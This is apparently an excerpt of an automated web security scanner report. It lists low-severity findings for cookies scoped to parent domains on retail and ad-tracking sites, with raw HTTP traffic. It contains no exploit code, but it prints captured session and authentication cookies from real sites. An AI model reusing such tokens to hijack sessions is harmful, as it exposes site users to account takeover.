Set-Cookie: DotomiNet=2$DjQqblZ1RXdFAmBdAgpyVAJHKDNEGQNFC15tVlFJZnhgewkJDQBKXRZSBwIZJRQWJA1ZfmhgWnZRIgFAaV0%3D; Domain=.dotomi.com; Expires=Wed, 15-May-2013 02:00:19 GMT; Path=/
Content-Type: text/html
Content-Length: 1523

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</head>

<body>
<script language="JavaScript" typ
...[SNIP]...

12.3. https://secure.bhphotovideo.com/bnh/controller/home previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://secure.bhphotovideo.com
Path:	/bnh/controller/home

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

JSESSIONID=nr1QNRFMzp!1551726241; domain=bhphotovideo.com; path=/
cookieID=18171364821305544044440; domain=bhphotovideo.com; expires=Saturday, 03-Jun-2079 14:21:31 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.4. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://secure.homedepot.ca
Path:	/webapp/wcs/stores/servlet/UserRegistrationForm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

WC_USERSESSION_-1002=%2d1002%2c%2d15%2cCAD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c10501%7c10501%7cnull%7c%2d2000%5d%2cSPiv6UKbre34gGrW2piYfWv44EQ%3d; Path=/; Domain=.homedepot.ca
WC_ACTIVESTOREDATA=%2d15%2c10051; Path=/; Domain=.homedepot.ca
WC_AUTHENTICATION_-1002=%2d1002%2crW6rzz%2fYGsIblj6FaaWMw7l8O7Y%3d; Path=/; Domain=.homedepot.ca; Secure

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.5. https://secure.orientaltrading.com/ui/userProfile/processRequest.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://secure.orientaltrading.com
Path:	/ui/userProfile/processRequest.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

JSESSIONID=LSR0NQ5JncTchv2GrGWHyGDfvFpDKhs5c5ThHL92VQvcmKBTQLms!-2120161015; domain=.orientaltrading.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.6. http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bhphotovideo.com
Path:	/c/browse/Underwater-Equipment/ci/11585/N/4294551294

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

JSESSIONID=2STpNQ5TWC!-112699937; domain=bhphotovideo.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c/browse/Underwater-Equipment/ci/11585/N/4294551294 HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/bnh/controller/home?KW=BANNER2&img=bh_wl.gif
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0pnRNQQMwR!-112699937; cookieID=18154535221305509932941; cmTPSet=Y; TS29f0cc=7f329831c9f74bab89d73187e3b1cfd8871d7ea6dc67d58e4dd0837960ac0ec5a2f86729b092ce85bc587bdd; cmRS=&t1=1305510783215&t2=1305510792033&t3=1305541011993&t4=1305510778300&lti=1305541011993&ln=Underwater&hr=/c/browse/Underwater-Equipment/ci/11585/N/4294551294&fti=&fn=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=&fd=&uer=&fu=&pi=RootPage.jsp&ho=server.bhphotovideo.com/cm%3F&ci=90132819

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Date: Mon, 16 May 2011 10:16:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=2STpNQ5TWC!-112699937; domain=bhphotovideo.com; path=/
Set-Cookie: TS29f0cc=c688b8f92f50d9b7e80f755703dbb3d6871d7ea6dc67d58e4dd0f99460ac0ec5f5b84ed0b092ce85bc587bdd; Path=/
Content-Length: 37549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<!--<meta http-equiv
...[SNIP]...

12.7. http://a.netmng.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.netmng.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

evo5=csmq4atf04cxa%7Co7sHAo0WiNAkV5aQXuATwLKnqcS7CiZMwsLzz4KjZ0u0qp3pkq8dEee9axkAPKMyKcjX7b%2Fj8u2pvMUKubOFmSXM7%2Bt0a6Ux23b%2BYSj08pAlornvRey34GAuBxIpydsc7XqPU6aRPmgH9%2FnsPER%2FdoRGgEVvdULoFhC9iH3sp31Vly6PXTxTMEfNAbPLdxsJgZThArgAu2FZdW2nOze9yxGDOI1muuzrVlGdOTN11V5CAWr3jbZbP%2FF39U8YDAxRZc6jF8SPBs2BGaJOfh52Yi4uav1ONnUmuw5m4GOxMErzgQqodDYqlk5V7GpMFF50jq1p9mFO%2BSMYIMzW0X2qY1bb0xTxY0WiV%2F05PStbeFKyfBPimlixNC1sOQBbQ3jEUFNFInZmY%2FCdeaP1REAfPTGTOBq3PsAoQ2Bd15zuYVt3hE%2BnRckFXgnwD2d8%2FOWdLYlMTkRkrg4XzCOJBw8F0TGKkTDwQxDH89mj%2FE24rfR9mqYMWMIDpv46H009GcZcooUqNc3iHid7BJ7%2BqsPj6hUcHS5wf1QjQ%2FsVI%2BkVsKU%3D; expires=Tue, 15-Nov-2011 02:01:04 GMT; path=/; domain=.netmng.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?aid=088 HTTP/1.1
Host: a.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5=csmq4atf04cxa%7CJeuRJCb45V6uwY1xci0duejpNnUE%2BOmzqGMogMAW%2FNCOqkjFJeQTtSSwFM8SExogUBVq3aRXr6rOPcqNTmIC7EZV1nRS%2FfrPyazw99gyUAJXaI4v2Tf%2FYK%2FYCGNRiTDa8FIC%2F1rDdFnvxSKmwnP9%2FzSswr%2BFnZEedqWLNPmJOGiD%2BKTS14anDruAemPci57rfbGvxyPHPZwrhH9c2PC0R7Ymr8xiYKFUBnazCBzOBnL2qGd20SpExMUheTADl1d0TTjVbjvJQVia2%2BYow6VA05s7EZxex6vE%2BvmQgXxXWwR2mefK966%2FeFMgLbGnQsm5mGE5l%2BYsVCNKIKht%2BM7JXtn8nweceJeqZuNgJnNvN7mezkeiy1MIOhXMGKv%2BHUozybOtALE61aKDO%2BSoPj%2BhNGduTlw4jjewTANsUadm4eJQ75KAJA1KpHCSrfNDIRnHjMMAwYuzMxzJA7OiUPCwQbVx7hAHs0TdLiuv7ZzwK309%2BcMucPBVwOOwAyb9yajE

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:04 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sat, 14 May 2011 02:01:04 GMT
Last-Modified: Sat, 14 May 2011 02:01:04 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5=csmq4atf04cxa%7Co7sHAo0WiNAkV5aQXuATwLKnqcS7CiZMwsLzz4KjZ0u0qp3pkq8dEee9axkAPKMyKcjX7b%2Fj8u2pvMUKubOFmSXM7%2Bt0a6Ux23b%2BYSj08pAlornvRey34GAuBxIpydsc7XqPU6aRPmgH9%2FnsPER%2FdoRGgEVvdULoFhC9iH3sp31Vly6PXTxTMEfNAbPLdxsJgZThArgAu2FZdW2nOze9yxGDOI1muuzrVlGdOTN11V5CAWr3jbZbP%2FF39U8YDAxRZc6jF8SPBs2BGaJOfh52Yi4uav1ONnUmuw5m4GOxMErzgQqodDYqlk5V7GpMFF50jq1p9mFO%2BSMYIMzW0X2qY1bb0xTxY0WiV%2F05PStbeFKyfBPimlixNC1sOQBbQ3jEUFNFInZmY%2FCdeaP1REAfPTGTOBq3PsAoQ2Bd15zuYVt3hE%2BnRckFXgnwD2d8%2FOWdLYlMTkRkrg4XzCOJBw8F0TGKkTDwQxDH89mj%2FE24rfR9mqYMWMIDpv46H009GcZcooUqNc3iHid7BJ7%2BqsPj6hUcHS5wf1QjQ%2FsVI%2BkVsKU%3D; expires=Tue, 15-Nov-2011 02:01:04 GMT; path=/; domain=.netmng.com
Content-Length: 4
Connection: close
Content-Type: text/html; charset=UTF-8

12.8. http://a.rfihub.com/ca.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rfihub.com
Path:	/ca.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

m="aAF25BkaA==AI20472990AAABL_aCnLI=AI20473163AAABL_aCVOI=AI20472990AAABL_Z4vn0=AI20472990AAABL_Z4bls=AI20473163AAABL_Z2OJY=";Path=/;Domain=.rfihub.com;Expires=Wed, 14-Nov-12 01:54:05 GMT
u="aAB7ilFUA==AI89bBrQ==AAABL_aCnLI=";Path=/;Domain=.rfihub.com;Expires=Wed, 14-Nov-12 01:54:05 GMT
f="aABTNDn0w==AK1305510033AB5AAABL_aCnLE=";Path=/;Domain=.rfihub.com;Expires=Wed, 14-Nov-12 01:54:05 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ca.gif?rb=398&ca=20472990&ct=REPLACE_ME_WITH_YOUR_CACHE_BUSTING HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=c615304299134845020; j=c615304299134845020; o=1-InfNhMB4STMs; p=1-InfNhMB4STMs; r=1305510033558; m="aAEeXBemQ==AI20473163AAABL_aCVOI=AI20472990AAABL_Z4vn0=AI20472990AAABL_Z4bls=AI20473163AAABL_Z2OJY="; u="aAB7h5nqw==AI89bBrQ==AAABL_aCVOI="; f="aABXkMDrQ==AK1305510033AB4AAABL_aCVOE="; e=co

Response

HTTP/1.1 302 Found
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: m="aAF25BkaA==AI20472990AAABL_aCnLI=AI20473163AAABL_aCVOI=AI20472990AAABL_Z4vn0=AI20472990AAABL_Z4bls=AI20473163AAABL_Z2OJY=";Path=/;Domain=.rfihub.com;Expires=Wed, 14-Nov-12 01:54:05 GMT
Set-Cookie: u="aAB7ilFUA==AI89bBrQ==AAABL_aCnLI=";Path=/;Domain=.rfihub.com;Expires=Wed, 14-Nov-12 01:54:05 GMT
Set-Cookie: f="aABTNDn0w==AK1305510033AB5AAABL_aCnLE=";Path=/;Domain=.rfihub.com;Expires=Wed, 14-Nov-12 01:54:05 GMT
Set-Cookie: e=co;Path=/;Domain=.rfihub.com;Expires=Wed, 14-Nov-12 01:54:05 GMT
Cache-Control: no-cache
Location: http://cm.g.doubleclick.net/pixel?nid=rfi&forward=http%3A%2F%2Fib.adnxs.com%2Fpxj%3Fbidder%3D18%26action%3Dsetuids%28%27615304299134845020%27%2C%27%27%29%3B%26redir%3Dhttp%253A%252F%252Fib.adnxs.com%252Fgetuidu%253Fhttp%253A%252F%252Fa.rfihub.com%252Fcm%253Fapxuid%253D%2524UID%2526forward%253Dhttp%25253A%25252F%25252Fib.adnxs.com%25252Fseg%25253Fadd%25253D79783%252526redir%25253Dhttp%2525253A%2525252F%2525252Fad.yieldmanager.com%2525252Fpixel%2525253Fid%2525253D1056936%25252526t%2525253D2%25252526piggyback%2525253Dhttp%252525253A%252525252F%252525252Fwww.googleadservices.com%252525252Fpagead%252525252Fconversion%252525252F1030878771%252525252F%252525253Flabel%252525253D8tkSCLfIiwIQs-zH6wM%2525252526amp%252525253Bguid%252525253DON%2525252526amp%252525253Bscript%252525253D0
Content-Length: 0

12.9. http://a.tribalfusion.com/i.cid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/i.cid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=a9nrejs2aFvDAJsbYZd7FMh2nQCFRDH0fa1otdZaZbc1scXdKPKEpkJfRWcSiSsMhXqubGvEyor; path=/; domain=.tribalfusion.com; expires=Sun, 14-Aug-2011 01:55:18 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.cid?c=294813&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=9342936133034.527?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=ainrPgt3erxPAxvPAB9VUZd5PbMJ94w4LX6qVV0Zcrx58XSW0MmLTRXaVdrFwaTw8GvrZb3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 307
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a9nrejs2aFvDAJsbYZd7FMh2nQCFRDH0fa1otdZaZbc1scXdKPKEpkJfRWcSiSsMhXqubGvEyor; path=/; domain=.tribalfusion.com; expires=Sun, 14-Aug-2011 01:55:18 GMT;
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,........@..D..;

12.10. http://action.media6degrees.com/orbserv/hbjs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://action.media6degrees.com
Path:	/orbserv/hbjs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

clid=2ll77mm01171voofy6a0tk1w02f1400a3r090l0950a; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
orblb=2ll8nk2032gu10u0200z3o00yg11zw10u0100yjk1y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
rdrlst=4090spbll9m03000000043r040d6hll8nk2000000093r090dlzll9l28000000053r0515ztll9l28000000053r0501hvll8nk2000000093r0916iell9m03000000043r0401g3ll8nk2000000093r090msvll9m03000000043r040e6mll9m03000000043r04; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
sglst=2050s90ill9m03000nn0043r040l04504dlell9l28000000053r050l055055msll9l28000000053r050l05505c24ll9l28000000053r050l055051jzll8nk200z3o0093r090l09509; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbjs?pixId=5204&pcv=30 HTTP/1.1
Host: action.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BDC5BFE2B79833787C45D44D5E9395EC; ipinfo=2ll77mm0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=014020a0g0h1ll77mmxzt12dfmxzt12dfmxzt10; clid=2ll77mm01171voofy6a0tk1w02ehk0093r080l08509; orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; rdrlst=4090spbll9m03000000033r030d6hll8nk2000000083r0815ztll9l28000000043r040dlzll9l28000000043r0401hvll8nk2000000083r0816iell9m03000000033r030msvll9m03000000033r0301g3ll8nk2000000083r080e6mll9m03000000033r03; sglst=2050s90ill9m03000430033r030l03503dlell9l28000000043r040l045045msll9l28000000043r040l04504c24ll9l28000000043r040l045041jzll8nk200yk40083r080l08508; vstcnt=418b010r01496o0118e1002

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02f1400a3r090l0950a; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: orblb=2ll8nk2032gu10u0200z3o00yg11zw10u0100yjk1y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: rdrlst=4090spbll9m03000000043r040d6hll8nk2000000093r090dlzll9l28000000053r0515ztll9l28000000053r0501hvll8nk2000000093r0916iell9m03000000043r0401g3ll8nk2000000093r090msvll9m03000000043r040e6mll9m03000000043r04; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: sglst=2050s90ill9m03000nn0043r040l04504dlell9l28000000053r050l055055msll9l28000000053r050l05505c24ll9l28000000053r050l055051jzll8nk200z3o0093r090l09509; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: JSESSIONID=E5833D4D3BA66471A3D9BEAA6132FFE0; Path=/orbserv
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 77
Date: Mon, 16 May 2011 01:55:01 GMT

(new Image(0,0)).src='http://ad.yieldmanager.com/pixel?t=2&id=1159169';

12.11. http://action.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://action.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

clid=2ll77mm01171voofy6a0tk1w02ezv00c3r0b0l0b50c; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
orblb=2ll8nk2031zw10u0200z2400yjk2gu10u0200z1q00yg11y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
rdrlst=4090spbll9m03000000063r060d6hll8nk20000000b3r0b0dlzll9l28000000073r0715ztll9l28000000073r0701hvll8nk20000000b3r0b16iell9m03000000063r0601g3ll8nk20000000b3r0b0msvll9m03000000063r060e6mll9m03000000063r06; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
sglst=2050s90ill9m03000me0063r060l06506dlell9l28000000073r070l075075msll9l28000000073r070l07507c24ll9l28000000073r070l075071jzll8nk200z2f00b3r0b0l0b50b; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1628 HTTP/1.1
Host: action.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B01CE493D943F3A2256745B41EB14658; ipinfo=2ll77mm0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=014020a0g0h1ll77mmxzt12dfmxzt12dfmxzt10; clid=2ll77mm01171voofy6a0tk1w02ezk00b3r0a0l0a50b; orblb=2ll8nk2031zw10u0200z2400yjk2gu10u0200z1q00yg11y510u0100000; rdrlst=4090spbll9m03000000053r050d6hll8nk20000000a3r0a15ztll9l28000000063r060dlzll9l28000000063r0601hvll8nk20000000a3r0a16iell9m03000000053r050msvll9m03000000053r0501g3ll8nk20000000a3r0a0e6mll9m03000000053r05; sglst=2050s90ill9m03000m30053r050l05505dlell9l28000000063r060l065065msll9l28000000063r060l06506c24ll9l28000000063r060l065061jzll8nk200z2400a3r0a0l0a50a; vstcnt=418b010r01496o0118e1002

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02ezv00c3r0b0l0b50c; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
Set-Cookie: orblb=2ll8nk2031zw10u0200z2400yjk2gu10u0200z1q00yg11y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
Set-Cookie: rdrlst=4090spbll9m03000000063r060d6hll8nk20000000b3r0b0dlzll9l28000000073r0715ztll9l28000000073r0701hvll8nk20000000b3r0b16iell9m03000000063r0601g3ll8nk20000000b3r0b0msvll9m03000000063r060e6mll9m03000000063r06; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
Set-Cookie: sglst=2050s90ill9m03000me0063r060l06506dlell9l28000000073r070l075075msll9l28000000073r070l07507c24ll9l28000000073r070l075071jzll8nk200z2f00b3r0b0l0b50b; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
Set-Cookie: vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 16 May 2011 01:54:16 GMT

GIF89a.............!.......,...........D..;

12.12. http://ad.trafficmp.com/a/bpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.trafficmp.com
Path:	/a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

T_82oo=jd9%3Az8g%3A1; Domain=trafficmp.com; Expires=Tue, 15-May-2012 01:57:54 GMT; Path=/
rth=2-ll8nk2-jd9~z8g~1~1-77k~yl0~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-; Domain=trafficmp.com; Expires=Tue, 15-May-2012 01:57:54 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=598&id=255&format=1305510841 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4372bf1d7-7ad8-48eb-b49d-630d41f880f6-gnq0edmv; T_25qb=77k%3Ayl0%3A1; rth=2-ll8nk2-77k~yl0~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Mon, 16 May 2011 01:57:53 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_25qb=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_82oo=jd9%3Az8g%3A1; Domain=trafficmp.com; Expires=Tue, 15-May-2012 01:57:54 GMT; Path=/
Set-Cookie: rth=2-ll8nk2-jd9~z8g~1~1-77k~yl0~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-; Domain=trafficmp.com; Expires=Tue, 15-May-2012 01:57:54 GMT; Path=/
Content-Length: 0

12.13. http://ads.adbrite.com/adserver/vdi/684339 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/684339

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rb2=CjQKBjY4NDMzORj20p_7EiIkNGRkMDdiYzgtZTk3Yi0xMThjLTNkZWMtN2I4YzVjMzA2NTMwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; path=/; domain=.adbrite.com; expires=Sun, 14-Aug-2011 01:58:26 GMT
ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlCAfhpzZWjsxiurlJxDuGWHJXSIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 13-May-2021 01:58:26 GMT
vsd=0@1@4dd084c2@www.imiclk.com; path=/; domain=.adbrite.com; expires=Wed, 18-May-2011 01:58:26 GMT
rb=0:684339:20838240:4dd07bc8-e97b-118c-3dec-7b8c5c306530:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0; path=/; domain=.adbrite.com; expires=Sun, 14-Aug-2011 01:58:26 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/684339?d=4dd07bc8-e97b-118c-3dec-7b8c5c306530 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; srh="1%3Aq64FAA%3D%3D"; rb=0:684339:20838240:110:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0; rb2=ChMKBjY4NDMzORi49477EiIDMTEwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlBwDuGWlaGxS6isUoJ%2BGnOHjXeIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; vsd=0@1@4dd083b0@fls.doubleclick.net

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 16 May 2011 01:58:26 GMT
